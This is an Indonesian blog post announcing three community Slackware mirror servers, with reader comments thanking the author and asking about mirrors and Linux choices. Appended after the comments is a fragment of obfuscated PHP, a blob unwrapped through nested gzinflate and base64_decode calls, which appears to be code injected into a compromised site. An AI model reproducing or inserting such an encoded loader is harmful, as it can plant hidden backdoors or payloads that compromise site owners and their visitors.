Delicious

Archives

Categories

Mirror-Slackware

  ozzie / 02/09/2007


Berawal dari kebutuhan.
Dikarenakan Doyan maen, ngoprek slackware, akhirnya server-server banyak yg menggunakan slackware ;));));)). dengan kebutuhan server dalam melakukan update, lalu me-Mirror iso dan packages. guna mempermudah dalam mendapatkan iso dan packages. dan menghemat bandwidth internasional. :D

1. mirror.slackware-id.org
Thx buat om budi yg udah minjemin subdomain ;))
mesin ini berada di Gedung Cyber dan terhubung dengan kapasitas 100Mbps melalui OpenIXP dan IIX.

Mirror Slackware

2. slackware.linux.or.id
Thx buat om ronny yg udah minjemin subdomain ;))
mesin ini berada di sebuah perumahan di kawasan Bekasi [Taman Bougenville] dengan NOC disamping kolam renang :D

3. kebonbinatang.org
mesin ini berada di kolong kasur ane :">:"> :D dengan kapasitas storage 160 GB. dan maksimum koneksi dibatesin cuma 3 Mbps :P:P.. maap ^:)^ ane juga kan mo monitoring & main game :P:P nanti jadi nge-lag gimanah? :-??

disamping iso ada beberapa source yg bermanpaat :D:D.. ijo-ijo dong gan ;));))


« »


7 Responses to “Mirror-Slackware”

  1. Martinus Ady H Says:

    Makacih om ozzie buat mirror2x indonya :)
    Teruskan perjuangannya om biar bisa jd mirror resmi di site slackware.com :)

  2. AxAL Says:

    Jack,
    pernah oprek Centos or Another Linux untuk kebutuhan DB Server ex. Business Applications, Oracle, etc.?
    gwe bingung mau milih manah Linux yang bagus untuk itu, coz gwe ga bisa Linux :| beberapa temen recomended use Centos. coz udah support ke Sparc. Right? need your advice.

  3. iang Says:

    kambing jg dah ikutan om :) tp yg versi baru aja :P

    http://kambing.ui.edu/slackware/, ftp, dan rsync

  4. utuh^kulaliL Says:

    Thkz bro atas mirror slackware indonya… mumpuni banget bt belajar slwackware… oya gw juga ada rencana mau bikin mirror server iso seperti kambing.ui.edu… but ada tutorial gak buat bikin mirror server seperti itu… tujuannya buat temen2 dikampus yang susah dapetin iso linux di samarinda… thkz bro…

  5. Firdaus Says:

    OM, mirror yang om kasih sama yang di http://ftp.slackbuild.org beda yah? kalo di slackbuild banyak paket2 yang gk ada di dvd installan. kok kalo di mirror yang om kasih, banyakan dah ada ya di installan. ato itu updatenya? thx

  6. ozzie Says:

    beda om :D:D… kalo yang di slackbuild.org hasil dari packager yang sengaja bikin buat slackware.. kalo yg di mirror slackware semua paket resmi yg di release… dan source-tree nya sesuai mirror slackware.. :">

  7. r32 Says:

    wah tararengkyu mirror nya…


".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>